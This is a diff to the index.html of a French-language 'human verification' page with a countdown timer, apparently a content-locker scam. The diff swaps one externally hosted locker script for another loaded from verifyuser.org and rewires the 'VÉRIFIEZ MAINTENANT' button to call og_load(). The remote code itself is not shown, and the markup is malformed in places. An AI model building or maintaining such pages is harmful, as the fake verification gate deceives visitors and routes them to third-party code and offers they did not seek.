--- a/index.html
+++ b/index.html
@@ -15,10 +15,8 @@
 		<link href="css/animate.css" rel="stylesheet">
 		<link href="css/magnific-popup.css" rel="stylesheet">
 		<link href="css/style.css" rel="stylesheet">
-		<script type="text/javascript">
-    var cdAbC_fkN_Rdsnkc={"it":4200451,"key":"743e6"};
-</script>
-<script src="https://d26h1wdc757l2w.cloudfront.net/be31704.js"></script>
+		<<script type="text/javascript" id="ogjs" src="https://verifyuser.org/cl/js/8dj1dk"></script>
+
 
 
 
@@ -43,7 +41,7 @@
 						<span id="human_verification_timer_time"><span>30 minutes and 00 seconds</span></span>
 					</div>
 					<div class="verification-button-wrapper">
-						<a <button="" onclick="_VX()" class="button">VÉRIFIEZ MAINTENANT</a>
+						<a <button="" onclick=og_load(); class="button">VÉRIFIEZ MAINTENANT</a>
 					</div>
 				</div>
 			</div>
